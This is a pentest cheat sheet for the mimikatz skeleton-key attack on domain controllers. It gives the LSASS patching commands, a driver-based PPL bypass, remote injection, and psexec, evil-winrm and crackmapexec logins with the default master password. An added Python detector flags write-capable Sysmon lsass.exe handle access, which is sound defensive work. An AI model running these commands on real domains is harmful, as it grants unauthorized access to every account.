Overview

Patches LSASS on the DC with a master password. Every user can then authenticate with their real password or with the skeleton key. Does not survive a DC reboot.

Mimikatz (On DC)

mimikatz # privilege::debug
mimikatz # misc::skeleton
Default skeleton key: mimikatz

Authenticate with Skeleton Key

# Any user with skeleton password
impacket-psexec DOMAIN/administrator:mimikatz@DC_IP
evil-winrm -i DC_IP -u administrator -p 'mimikatz'
crackmapexec smb DC_IP -u administrator -p 'mimikatz'
Original passwords still work too.

Remote Injection (Needs DA)

If you already have code execution on the DC:
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName DC_HOSTNAME

Notes

  • Patches LSASS memory on DC — not persistent across reboots
  • All domain users affected
  • Original passwords still work
  • Default skeleton password: mimikatz
  • LSASS must not be running as Protected Process (PPL)
  • Detection: monitor LSASS memory modifications
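The last note is the defender's angle. Installing a skeleton key means writing into LSASS memory, so a handle to lsass.exe that carries PROCESS_VM_OPERATION and PROCESS_VM_WRITE is the signal to alert on; read-only handles are what credential dumping needs but cannot patch the process. The following detector is an added example, not code from the original page or from mimikatz; it parses constructed Sysmon Event ID 10 (ProcessAccess) records in a flattened key=value form (field names follow the Sysmon schema, the processes and paths are invented) and classifies each LSASS handle by the access mask it was granted.

```python
# Added detection example (not from the original page): classify handles opened
# to lsass.exe from Sysmon Event ID 10 records. misc::skeleton patches LSASS in
# place, which needs PROCESS_VM_OPERATION | PROCESS_VM_WRITE on the handle;
# VM_READ-only handles are a credential-dumping signal but cannot patch LSASS.
import re

PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PATCH_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Constructed sample records (field names follow the Sysmon EID 10 schema;
# source images, paths and masks are invented for this example).
SAMPLE_EVENTS = """\
EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000
EventID=10 SourceImage=C:\\Users\\svc\\t.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1438
EventID=10 SourceImage=C:\\Temp\\dump.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1010
EventID=10 SourceImage=C:\\Users\\svc\\t.exe TargetImage=C:\\Windows\\System32\\notepad.exe GrantedAccess=0x1fffff
EventID=3 SourceImage=C:\\Windows\\System32\\lsass.exe DestinationPort=88
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened key=value record into a dict (empty for blank lines)."""
    return dict(FIELD_RE.findall(line))


def classify_lsass_access(event):
    """'write' for a patch-capable handle to lsass.exe, 'read' for a read-only
    memory handle, None for any other event."""
    if event.get("EventID") != "10":
        return None
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    granted = int(event.get("GrantedAccess", "0"), 16)
    if granted & PATCH_MASK == PATCH_MASK:
        return "write"
    if granted & PROCESS_VM_READ:
        return "read"
    return None


def find_lsass_access(log_text):
    """List (SourceImage, kind) for every event that touched lsass.exe memory."""
    hits = []
    for line in log_text.splitlines():
        event = parse_event(line)
        kind = classify_lsass_access(event)
        if kind:
            hits.append((event["SourceImage"], kind))
    return hits


if __name__ == "__main__":
    for image, kind in find_lsass_access(SAMPLE_EVENTS):
        print(f"ALERT [{kind}] lsass.exe opened by {image}")
```

On a real DC, feed it the ProcessAccess events from the Sysmon operational log and tune an allowlist for the few system processes that legitimately hold write-capable handles, otherwise the "write" hits are exactly what a skeleton key injection produces.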

If LSASS is Protected (PPL)

mimikatz # misc::skeleton /driver
Loads kernel driver (mimidrv.sys) to bypass PPL.

Quick Reference

Task              Command
Inject            misc::skeleton (on DC)
Default password  mimikatz
Login             impacket-psexec DOMAIN/anyuser:mimikatz@DC
Survives reboot   No